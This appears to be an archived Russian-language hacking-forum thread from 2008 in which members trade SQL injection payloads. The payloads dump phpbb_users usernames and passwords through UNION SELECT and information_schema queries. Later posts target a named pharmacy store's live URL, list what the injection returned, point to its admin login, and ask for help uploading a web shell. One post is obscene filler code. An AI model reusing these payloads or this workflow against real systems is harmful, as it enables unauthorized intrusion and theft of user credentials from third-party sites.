ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.03.2008, 17:53
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
phpbb_users в другой бд
id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10, 11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'+limit+1,1/*
то что получится и будет бд, потом:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+БД.phpbb_users+limit+1,1/*
__________________
Карфаген должен быть разрушен...
|
|
|
22.03.2008, 18:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Сообщение от Scipio
phpbb_users в другой бд
id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10, 11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'+limit+1,1/*
то что получится и будет бд, потом:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+БД.phpbb_users+limit+1,1/*
возвращает в первом запросе пустоту.
+ если беру на угад например:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+forum.phpbb_users/*
возвращает
SELECT command denied to user sdf'@'localhost' for table 'phpbb_users'
__________________
BlackHat. MoDL
|
|
|
|
22.03.2008, 18:24
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
попробуй без limit:
id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10, 11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
22.03.2008, 18:29
|
|
Banned
Регистрация: 17.03.2008
Сообщений: 22
Провел на форуме:
140962
Репутация:
5
|
|
Попробуй так :
PHP код:
<?Govyuazhiy huy
"Ebitnya";
?HUY>
|
|
|
|
22.03.2008, 18:32
|
|
Участник форума
Регистрация: 08.09.2006
Сообщений: 194
Провел на форуме:
1627025
Репутация:
163
|
|
Сообщение от Dimi4
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''phpbb_users''' at line 1
''phpbb_users''' идет экранирование кавычек одиночных... попробуй обойди с помощью char()
|
|
|
|
22.03.2008, 18:37
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Обошол!(/*)
Спасибо всем кто помог, всем +5
__________________
BlackHat. MoDL
Последний раз редактировалось Dimi4; 22.03.2008 в 18:47..
|
|
|
|
22.03.2008, 18:38
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от LolFEm
''phpbb_users''' идет экранирование кавычек одиночных... попробуй обойди с помощью char()
ндя, нет там никакого экранирования, посмотри еще раз на ошибку, просто кавычка скриптом добавляется и все, т.е. надо отсекать ее с помощью комментов /*
__________________
Карфаген должен быть разрушен...
|
|
|
|
22.03.2008, 22:25
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Нашел скулю
--------------------------
Сеть аптечных магазинов!
Цитата:http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,4,5/*#s576
5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables
Цитата:http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,table_name,5+fr om+information_schema.tables/*#s576
----------------------------------
вывожу колонки? например с zdp_usr
http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,column_name,5+f rom+information_schema.columns+where+table_name+li ke+`zdp_usr`/*#s576
получаю
как я понял экранирования кавычек нет
------------------------------------
но при попытке вывода колонок выплевует
звездочки-заместо текста и ошибку
Не могу получить перечень оборудования! The used SELECT statements have a different number of columns
------------------------------------
рас уж кавычки не фильтруются, значит как то можно залить шелл
я шеллы еще не заливал-буду рад примеру
------------------------------------
Последний раз редактировалось samarin; 22.03.2008 в 22:33..
|
|
|
|
22.03.2008, 22:57
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Звёздочки это аккаунт,вот админка
_http://www.zdorovie-plus.com/adm/login.php
З.Ы.Т.е. логин 5 звёздочек и пароль 5 звездочек 
А шелл врятли, прав не хватит, если через скуль,а в админке я не лазил можешь посмотреть
Последний раз редактировалось jokester; 22.03.2008 в 23:17..
Причина: дополнение
|
|
|
|
22.03.2008, 23:13
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
по поводу аккаунта спасибо-сам бы не догадался, что звездочки-это вовсе не звездочки
а по поводу админки я уже нашел на http://madnet.name/tools/madss/
-------------------------------
а как насчет шелла?
-------------------------------
хотелось бы сделать копию сайта-для экспериментов на локалхосте(или взять где-то любую другую копию более менее "серьезного"сайта)
--------------------------------
в админке был-мне это ничего не дало
Я ж говорю: шеллы никогда еще не заливал, прошу помощи, потому что на примере учиться легче и понятней, чем на голой теории
Последний раз редактировалось samarin; 22.03.2008 в 23:34..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
